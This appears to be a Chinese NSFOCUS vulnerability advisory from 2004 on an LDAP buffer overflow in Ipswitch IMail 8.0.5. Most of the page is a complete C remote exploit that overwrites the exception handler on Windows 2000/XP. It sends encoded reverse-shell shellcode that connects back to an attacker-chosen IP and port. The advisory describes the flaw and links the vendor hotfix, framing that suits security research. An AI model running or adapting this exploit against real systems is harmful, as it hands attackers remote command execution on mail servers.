首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第46期->最新漏洞
日期:2004-03-05
发布日期:2004-02-17
更新日期:2004-02-24
受影响系统:
Ipswitch IMail 8.0.5
Ipswitch IMail 8.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9682
Ipswitch IMail server是一款基于WEB的邮件解决方案。
Ipswitch LDAP守护进程不充分检查用户提供的LDAP标记,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以LDAP守护进程进程权限在系统上执行任意指令。
LDAP消息由包含标记的长度和内容组成,如下的标记0x02 0x03 0x0A 0x25 0xBD代表整数665,501 (0xA25BD),如果攻击者提供的长度标记过长,当程序处理时根据标记长度拷贝用户提供的数据时缺少充分边界检查,可由于如下汇编指定而导致覆盖堆栈中内存地址:
.text:00401188 mov byte ptr [ebp+ecx+var_4], dl
精心提交拷贝数据可能以LDAP守护进程进程权限在系统上执行任意指令。
<*来源:iDEFENSE Labs (labs@idefense.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107705541425564&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
kralor 提供了如下测试代码:
/******************************************************************/
/* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */
/******************************************************************/
/* fuck iDefense */
/* fuck k-otik */
/* fuck private exploits */
/* in other words, fuck you all security money makers and */
/* private exploits exchangers. */
/* lolo xXx for her patience while these long nights coding */
/* and for errr.. you know what :) */
/******************************************************************/
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR0x50FFFFFF
/* for win2k offset:
--- jmp dword ptr [ebx]
*/
#define HIJACKED_2K_EVL0x0043BD8B// (8.05 eval)
#define HIJACKED_2K_EXP0x1000F7B0// (8.05 express)
#define HIJACKED_2K_PRO0x1000F7A9// (8.05 pro (not sure :)))
/* for winXP offset:
--- pop esi
--- pop ebx
--- ret
*/
#define HIJACKED_XP_EVL0x0041F5C7// (8.05 eval)
#define HIJACKED_XP_EXP0x100106BC// (8.05 express)
#define HIJACKED_XP_PRO0x100103CC// (8.05 pro) (not sure :)))
// sequence of 4 opcodes
#define HOP0xd4 // host opcode
#define POP0xd7 // port opcode
int cnx(char *host, int port)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;
sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons((u_short)port);
if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}
void banner(void)
{
printf("\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void syntax(char *prog)
{
printf("\r\nsyntax: %s <host> <your_ip> <your_port> <version> [OSver]\r\n\r\n",prog);
printf("<version>\t0\t8.05 professional\r\n");
printf(" \t1\t8.05 express\r\n");
printf(" \t2\t8.05 evaluation\r\n---\r\n");
printf("[OSver] \t0\twindows 2000 universal [default]\r\n");
printf(" \t1\twindows XP universal\r\n");
exit(0);
}
int main(int argc, char *argv[])
{
int sock,bytes,target,osver=0;
WSADATA wsaData;
char buffer[8095];
unsigned long host,port;
unsigned int i;
char req1[] =
"\x30\x82"/* bind request*/
"\x0a\x3d"/* bind req len*/
/* msg id*/
"\x02"/* integer*/
"\x01"/* length*/
"\x01"/* value*/
"\x60"/* bind request*/
"\x82"/* msg length 2bytes*/
"\x01\x36"/* msg length*/
/* LDAP ver */
"\x02"/* integer*/
"\xff"/* length*/
"\x03"/* value*/
"\x05\x00"/* DN NULL*/
"\x80\x00"; /* Auth simple*/
char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
"\x90"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
/* reverse remote shell */
"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
"\x57\x91\x95";
banner();
if(argc<5||argc>6)
syntax(argv[0]);
host=inet_addr(argv[2])^0x95959595;
port=atoi(argv[3]);
if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
printf("error: <version> must be one digit\r\n");
syntax(argv[0]);
return -1;
}
target=atoi(argv[4]);
if(target<0||target>2) {
printf("error: <version> must be 0, 1 or 2\r\n");
syntax(argv[0]);
return -1;
}
if(argc==6) {
if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
printf("error: [OSver] must be one digit\r\n");
syntax(argv[0]);
return -1;
}
osver=atoi(argv[5]);
if(osver<0||osver>1) {
printf("error: [OSver] must be 0 or 1\r\n");
syntax(argv[0]);
return -1;
}
}
if(port<=0||port>65535) {
printf("error: <port> must be between 1 and 65535\r\n");
syntax(argv[0]);
return -1;
}
port=htons((unsigned short)port);
port=port<<16;
port+=0x0002;
port=port^0x95959595;
for(i=0;i<sizeof(shellc0de);i++) {
if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
memcpy(&shellc0de[i],&host,4);
host=0;
}
if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
memcpy(&shellc0de[i],&port,4);
port=0;
}
}
if(host||port) {
printf("error: unabled to find ip/port sequence in shellc0de\r\n");
return -1;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1],389);
if(!sock)
return -1;
/* <----- magic packet -----> */
strncpy(buffer,req1,13);
memset(&buffer[13],0x90,7010);
*(unsigned long*)&buffer[13] = SEH_ADDR;
if(!osver) {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
} else {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
}
*(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 <unwanted instructions> on winXP
memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1);
memcpy(&buffer[7000+23],&req1[10],4);
printf("[+] Sending magic packet ...");
bytes=send(sock,buffer,sizeof(buffer)-1,0);
printf("Done\r\n");
if(bytes==0) { printf("error: send()\r\n"); }
closesocket(sock);
return 0;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Ipswitch
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Ipswitch IMail 8.0.5:
Ipswitch Hotfix im805HF2.exe
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/im805HF2.exe
版权所有,未经许可,不得转载